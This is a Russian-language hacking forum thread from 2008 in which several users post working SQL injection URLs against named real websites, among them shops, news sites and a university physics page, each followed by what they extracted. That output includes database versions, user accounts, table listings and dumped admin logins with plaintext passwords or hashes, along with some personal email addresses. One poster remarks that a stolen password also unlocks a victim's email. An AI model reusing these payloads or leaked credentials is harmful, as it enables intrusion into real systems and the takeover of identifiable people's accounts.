ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Очередной шоп
  #6911  
Старый 22.11.2008, 03:30
Аватар для FNS
FNS
Новичок
Регистрация: 07.11.2008
Сообщений: 17
Провел на форуме:
51589

Репутация: 55
Отправить сообщение для FNS с помощью ICQ
По умолчанию Очередной шоп

Код:
http://www.sunshinejewelry.com/cs.php?id=-2+union/**/select/**/1,2,table_name,4/**/from/**/`information_schema`.tables+--+
Цитата:
5.0.51a-community
 
Ответить с цитированием

  #6912  
Старый 22.11.2008, 17:48
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Вот снова не большой збор скулей от меня:
Код:
http://www.tregu-kosovar.com/inseratedetails.php?id=247'+and+1=1+union+all+select+1,2,3,4,5,concat(username,char(58),passwort),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+az_user/*&refid=&lang=
логин/пасс:
Код:
leaa:21881
------------------------------------------------
Код:
http://www.albanianroyalfamily.com/index.php?faqe=shfaqlajm&lajmid=-9999+union+all+select+1,2,convert(concat_ws(char(58),username,password)+using+utf8),4,null,6,null,8,9+from+login--
логин/пасс:
Код:
admin:mbreti
---------------------------------------------
Код:
http://www.mycybermedia.com/listo_kategori.php?kategorianr=-9999+union+all+select+1,2,3,4,null,concat_ws(char(58),username,password),7,8,9,10,11,12+from+admin--
логин/пасс:
Код:
admin:admin
------------------------------------------
Код:
http://www.albauto.com/rallyalbania/galeri_info.php?ida=26+and+1=2+union+all+select+1,2,3,concat(username,char(58),password),5,6+from+editor/*&page=29
логин/пасс:
Код:
 admin:ee99fafdaf801531af8861addda2603c
--------------------------------------------
Код:
http://www.environment.adanet.com.al/tekst.php?idt=16+and+1=2+union+all+select+1,concat(user,char(58),password),3,4,5,6,7,8,9,10+from+mysql.user/*
логин/пасс:
Код:
root:54c57d3714ca092d
------------------------------------------
Код:
http://www.reutov.net/iss/photo_news/news/newsone.php?id=-394%20union%20select%201,2,3,4,concat_ws(char(58),name,pass),6,7,8,9+from+users+limit+1,1/*
логин/пасс:
Код:
drupal:9536bdcd9e3faa581d6991b5d04ac4ec
-----------------------------------------
Код:
http://www.wonpwn.com/games.php?id=-2'+union+select+1,username,3,user_password,5,6,7,8,9,0,1+from+bb2_users+limit+1,1/*
логин/пасс:
Код:
JimmyDinner:2e4b43e13698dd4df580f90b76b0de2a
----------------------------------------
Код:
http://www.housescreen.be/ugroups.php?UID=1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+signup--
логин/пасс:
Код:
frans:9d0aa885d8b6db599231726fd377f739
benny:74d39d16ccd8128184800880e529db76 
Eveline:c45817c7a68626d7428e95e3a0dad694 
Dsky:7d91594f16e9674749bc1cf3f91752af
Bart:008884c57916bb8fd80421cfed45ac38
[test:098f6bcd4621d373cade4e832627b4f6
-------------------------------------------
Код:
http://www.ajaxprojects.com/ajax/viewcategory.php?categoryid=-8+union+select+1,2,concat(username,0x3a,0x3a,password,0x3a,email),4,5,6,7+from+user/*
логин/пасс/мыло:
Код:
ajax::29062006:ajaxteam@gmail.com
----------------------------------------------
Код:
http://www.heimlichinstitute.org/page.php?id=null+UNION+ALL+SELECT+1,convert(concat(user,0x3a,password)+using+latin1),3,4+FROM+mysql.user--
логин/пасс:
Код:
root:*C3F44A16E1B0CA7DABAA9587D64AF55B1C7833C4
-----------------------------------------------
Код:
http://www.donabauer.at/bookmarks//view_group.php?id=-1+union+select+0,1,concat_ws(0x3a,username,password),3,4,5,6,7+FROM+apb_users--
логин/пасс:
Код:
 gast:27wvfetVjvcRo
------------------------------------------------
Код:
http://www.aesouk.com/category.php?cate_id=-2+UNION+SELECT+1,concat_ws(0x3a,user_name,password),3,4+from+admin--
логин/пасс:
Код:
 Categories within admin:$1$p8EHR3eg$brgVoxx0n4udlQ35s2iCo0
-------------------------------------------------
Код:
http://www.schuetzenbund.de/shop/list.php?id=-21%27+union+select+1,concat_ws(char(58),name,password),3,4,5,6,7,8,9+from+user/*
логин/пасс:
Код:
admin:sh00ting
------------------------------------------------
Код:
http://www.solusihukum.com/artikel.php?id=-1+union+select+1,2,concat_ws(0x10,pwd,uid),4,5+from+user/*
логин/пасс:
Код:
jingklong:kong
Код:
agungjuga:agung
Код:
jalil:andy
---------------------------------------------
Код:
http://www.tiranatimes.com/newscat.php?id=5+and+1=1+union+all+select+1,concat(username,char(58),password),3,4,5+from+tt_users/*&cat=5
логин/пасс:
Код:
GEMA:GEMATT
---------------------------------------------
The End!

Последний раз редактировалось -m0rgan-; 22.11.2008 в 18:12..
 
Ответить с цитированием

  #6913  
Старый 22.11.2008, 19:20
Аватар для Ламоза
Ламоза
Новичок
Регистрация: 26.07.2008
Сообщений: 23
Провел на форуме:
414646

Репутация: 20
По умолчанию

Код:
http://www.chicken.org.au/page.php?id=-150+union+select+1,2,3,4,5,login,7,password,9,10,11,12,13+from+users/*
Код:
http://www.rsphysse.anu.edu.au/nuclear/personnel.php?id=-50+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
nucleus_reader@rsphyweb.anu.edu.au
nucleus
5.0.45

Код:
access_log  awards  change_log  classifications  collaboration_files  contact_info  document_changes  document_classes  document_templates  documents  documents_emg_save  grant_classes  grant_schemes  grant_types  grants  groups_blurbs  groups_photos  job_adverts  notices  people_links  peoples_groups  peoples_publications  personnel  project_types  projects  projects_contacts  projects_types  publications  reference_transform  research_groups  resource_form_types  resource_forms  resource_link_types  resource_links  schedule_annotations  schedule_entries  schedule_equipment  schedules  seminars  tank_openings
Код:
http://ausmed.com.au/publications/displaybook.php?id=-38+union+select+1,aes_decrypt(aes_encrypt(version(),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
4.1.11

Последний раз редактировалось Ламоза; 22.11.2008 в 20:00.. Причина: update
 
Ответить с цитированием

  #6914  
Старый 22.11.2008, 19:41
Аватар для Hero1n
Hero1n
Новичок
Регистрация: 11.11.2008
Сообщений: 18
Провел на форуме:
295080

Репутация: 17
По умолчанию

Цитата:
http://www.totstotravel.co.uk/index2.php?id=-8+union+select+1,version(),3/*
4 версия, не получилось подобрать имена таблиц
 
Ответить с цитированием

  #6915  
Старый 22.11.2008, 19:56
Аватар для WAR!9G
WAR!9G
Участник форума
Регистрация: 24.06.2007
Сообщений: 299
Провел на форуме:
467372

Репутация: 212
По умолчанию

Цитата:
4 версия, не получилось подобрать имена таблиц
имя таблицы - дефаулт: mysql.user

Цитата:
http://www.totstotravel.co.uk/index2.php?id=-8+union+select+1,2,3+from+mysql.user/*
Вот только прав недостаточно:
Error 1142 : SELECT command denied to user 'tots'@'server213-171-218-213.livedns.org.uk' for table 'user'
 
Ответить с цитированием

  #6916  
Старый 22.11.2008, 21:39
Аватар для BanQui
BanQui
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452

Репутация: 36
По умолчанию

Ну вот нашел http://www.rfbd.ru/info.php?id=-2+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13,14&region=&rubrika=3--
Version: 5.0.37-standard-log
Ну кароч на сайте ниче полезного не нашел!Воть ссылка на перебол таблиц
http://www.rfbd.ru/info.php?id=-2+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12 ,13,14+from+information_schema.tables+limit+1,1&re gion=&rubrika=3--
 
Ответить с цитированием

  #6917  
Старый 22.11.2008, 23:30
Аватар для faza02
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
http://www.k9magazine.com/pages.php?pid=7+and+0+union+select+1,convert(user()+using+latin1),3,4/*
user(): k9_magazine1@64.111.99.240
database(): k9magazine1
version(): 4.1.16-standard-log
 
Ответить с цитированием

  #6918  
Старый 23.11.2008, 08:51
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

http://www.fretz-music.co.uk/news.php?id=3+union+select+1,2 ,3,4,5,6,7/*

5.0.27
fretzdb@localhost
fretzdb

http://www.questionbox.org/news.php?type=news&id=3+union +select+1,2,3,4,5,6,7,8,9/*
4.0.27-max-log
dbo231123474@74.208.16.57

http://www.gomountainlions.com/news.php?id=3+union +select+1/*
Database Version: 4.1.22-standard
Database name: athletics
User name: athletics@localhost


http://billiard4u.net/article/article.php?id=-39+union+select+1,2,version(),4,5,user(),7,8,9,dat abase(),11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36--

4.1.22-standard
main_mainbilluse@localhost
main_mainbilldb


http://www.econepal.org/news.php?id=14+union+select+1,2,3,4, 5,6,7--&newstype=1
Database Version: 5.0.67-community
Database name: econepal_econep
User name: econepal_ecouser@c05.privatesystems.net
 
Ответить с цитированием

  #6919  
Старый 23.11.2008, 11:01
Аватар для xPriZrAkx
xPriZrAkx
Познающий
Регистрация: 16.03.2007
Сообщений: 48
Провел на форуме:
293334

Репутация: 39
По умолчанию

Цитата:
http://www.michaelpollan.com/article.php?id=1+union+select+1,version(),3,4,5,6, 7,8,9,10--
4.1.22-standard
pollan_article@localhost


Цитата:
http://www.plaza-shopping.com/shop.php?id=3982+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18--
4.0.27-max-log
plazashopping@68.178.232.199


Цитата:
http://www.forbidden-paradise.de/eng/shop.php?CAT=picture&ID=17455+union+select+1,2,3,v ersion(),5,6,7,8,9,10,11,12--
4.0.15
web25@localhost


Цитата:
http://www.shopavalonmall.com/store.php?id=6435+union+select+1,version(),3,4,5,6 ,7,8--
4.0.26-standard
aval3_webadmin@ns50.secureserver50.com

Цитата:
http://www.walkerspopcorn.com/store.php?p=itm&id=256+union+select+1,2,3,4,versio n(),6,7,8,9,10,11--
5.0.51a-community
 
Ответить с цитированием

  #6920  
Старый 23.11.2008, 21:38
Аватар для Hero1n
Hero1n
Новичок
Регистрация: 11.11.2008
Сообщений: 18
Провел на форуме:
295080

Репутация: 17
По умолчанию

Код:
http://www.americanschoolfes.com/admin.php?id=-5+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6--
5.0.51a-community-log:amschfes_jim@localhost:amschfes_amschfes

Код:
http://www.americanschoolfes.com/admin.php?id=-5+union+select+1,table_name,3,4,5,6+from+information_schema.tables+limit+32,1--
users_usr

Код:
http://www.americanschoolfes.com/admin.php?id=-5+union+select+1,column_name,3,4,5,6+from+information_schema.columns+where+table_name=0x75736572735f757372+limit+0,1--
Id_usr
firstname_usr
lastname_usr
pword_usr
userlevel_usr
username_usr
email_usr


Код:
http://www.americanschoolfes.com/admin.php?id=-5+union+select+1,concat(username_usr,0x3a,pword_usr,0x3a,email_usr),3,4,5,6+from+users_usr+limit+0,1--
jcamomile:ginger:jcamomile@pobox.com
mhasbrouck:hope4fez:mhasbrouck@aol.com
elozano:tigers:edlo57@yahoo.com - пасс подходит на мыло.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ